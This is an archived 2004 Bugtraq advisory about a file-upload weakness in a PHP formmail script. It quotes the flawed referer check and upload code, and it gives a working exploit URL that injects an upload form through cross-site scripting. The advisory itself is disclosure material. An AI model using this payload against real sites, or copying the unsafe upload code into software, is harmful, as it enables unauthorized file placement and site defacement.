lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040206113652.6553.qmail@www.securityfocus.com>
Date: 6 Feb 2004 11:36:52 -0000
From: Himeur Nourredine <lostnoobs@...urity-challenge.com>
To: bugtraq@...urityfocus.com
Subject: formmail (PHP) Upload file using CSS




Informations : 
°°°°°°°°°°°°°° 
Website : http://www.dtheatre.com/scripts/
Version : all
Problem : Upload file



PHP Code/Location : 
°°°°°°°°°°°°°°°°°°° 
formmail.php : 
------------------------------------------------------------------ 
function check_referer($referers) {
   if (count($referers)) {
      $found = false;

      $temp = explode("/",getenv("HTTP_REFERER"));
      $referer = $temp[2];
      
      if ($referer=="") {$referer = $_SERVER['HTTP_REFERER'];
         list($remove,$stuff)=split('//',$referer,2);
         list($home,$stuff)=split('/',$stuff,2);
         $referer = $home;
      }
      
      for ($x=0; $x < count($referers); $x++) {
         if (eregi ($referers[$x], $referer)) {
            $found = true;
         }
      }
      if ($referer =="")
         $found = false;
      if (!$found){
         print_error("You are coming from an <b>unauthorized domain.</b>");
         error_log("[FormMail.php] Illegal Referer. (".getenv("HTTP_REFERER").")", 0);
      }
         return $found;
      } else {
         return true; // not a good idea, if empty, it will allow it.
   }
}
------------------------------------------------------------------ 
...
------------------------------------------------------------------ 
// check for a file if there is a file upload it
if ($file_name) {
   if ($file_size > 0) {
      if (!ereg("/$", $path_to_file))
         $path_to_file = $path_to_file."/";
      $location = $path_to_file.$file_name;
      if (file_exists($path_to_file.$file_name))
         $location = $path_to_file.rand(1000,3000).".".$file_name;
      copy($file,$location);
      unlink($file);
      $content .= "Uploaded File: ".$location."\n";
   }
}
------------------------------------------------------------------ 

You can bypassing the REFERER protection and put a file on the site (for exemple with a Cross Site Scripting on the same site).This option running even if this function is desactivated.

Exploit : 
°°°°°°°°° 

http://www.exemple.com/foo.php?css=<form%20method=post%20enctype=multipart/form-data%20action=formmail.php><input%20type=hidden%20name=MAX_FILE_SIZE%20value=1000000><input%20type=hidden%20name=path_to_file%20value=./><input%20type=text%20name=email><input%20type=file%20name=file%20><input%20type=hidden%20name=recipient%20%20value=%20foo@....com%20><input%20type=submit>


Whith :
http://www.exemple.com/formmail.php
and
http://www.exemple.com/file.php?css= <-- Cross Site Scripting Here



For More details : 
°°°°°°°°°°°°°° 
IRC : hauzgur.serveirc.com / #defaced


Nourredine Himeur

www.security-challenge.com




Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ